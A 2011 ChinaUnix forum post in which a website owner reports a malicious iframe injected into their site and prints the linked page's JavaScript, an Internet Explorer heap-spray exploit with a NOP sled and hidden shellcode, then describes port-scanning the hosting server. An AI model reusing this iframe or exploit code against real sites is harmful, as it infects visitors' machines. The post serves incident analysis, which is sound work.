免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
最近访问板块 发新帖
查看: 1074 | 回复: 0

bing1227.3322.org恶意的代码被360拦截 [复制链接]

论坛徽章:
0
发表于 2011-12-19 14:02 |显示全部楼层

今天网站突然出现360已经拦截2个木马请求,查看代码 多了以下的恶意代码:


<iframe src= http://bing1227.3322.org:8080/19.htm width=500 height=500></iframe>


这个网页内容是:


<div id=sun style='display:none'>



悙悙悙悙悙悙悙悙
 <BUTTON ID='anhey' ONCLICK='anheywangma();' STYLE='DISPLAY:NONE'></BUTTON>
<script language="JavaScript">                                    
    function code()                                               
{                                                              
    var div=document.getElementById('sun');                       
    var decode=div.innerHTML;                                     
    var x=decode.indexOf('MM');                                   
    var y=decode.indexOf('NN');                                   
    var xxcode=decode.substring(x+2,y);                           
    return xxcode;                                                
}                                                                
function sc()                                                  
{                                                              
    var div=document.getElementById('sun');                       
    var decode=div.innerHTML;                                     
    var x=decode.indexOf('XX');                                   
    var y=decode.indexOf('YY')                                    
    var cc=decode.substring(x+2,y);                               
    cc=unescape(cc);                                              
    return cc;                                                    
}                                                              
                                                               
function anheywangma()                                                 
{                                                              
    var d=document.createElement('DIV');                          
    d.addBehavior('#default#userData');                           
    document.appendChild(d);                                      
    try{for (i=0;i<10;i++)                                        
        {d.setAttribute('s',window);}}                              
    catch(e){}                                                    
    window.status+='';                                            
    }                                                             
var memory;                                                    
var temptest = decodeURI(',sun,0c0c,sun,0c0c');                
var nop=unescape(temptest.replace(/,sun,/g,'%u'));             
var SC=sc();                                                   
var xcode=code()-SC.length*2;                                  
while(nop.length <= xcode) nop+=nop;                              
nop=nop.substring(0,xcode - SC.length);                        
memory=new Array();                                            
for(i=0;i<0x100;i++){memory[i]=nop + SC;}                      
                                                               
CollectGarbage();                                              
document.getElementById('anhey').onclick();                      
</script>                                                      
   


这个bing1227.3322.org的IP是:118.126.5.117属于上海市 集思网络 IDC。
或许是被肉鸡了。。然后有人再恶意利用了。。
3322.org是动态域名,也可以作为固定ip服务。。就是免费2J域名了。。

这个服务器
开放了21 8080 3389端口
21 是小型ftp
Quick Easy FTP Server.rar 3.9.3 吧。。
8080是HFS 汉化版,里面有五个文件。。其中就包括这个木马文件


网上搜了搜
http://www.discuz.net/forum.php?mod=viewthread&tid=2020410&extra=page%3D1&page=1
这个有涉及到这个恶意代码。。
看来这个恶意的hfs 发布的网页 已经有六天了。。
上面说是ARP,不过没有解释。。。

3389端口开了,但是无法进入,不知道密码。。FTP也是。。要不一定要关闭这个站!!

您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP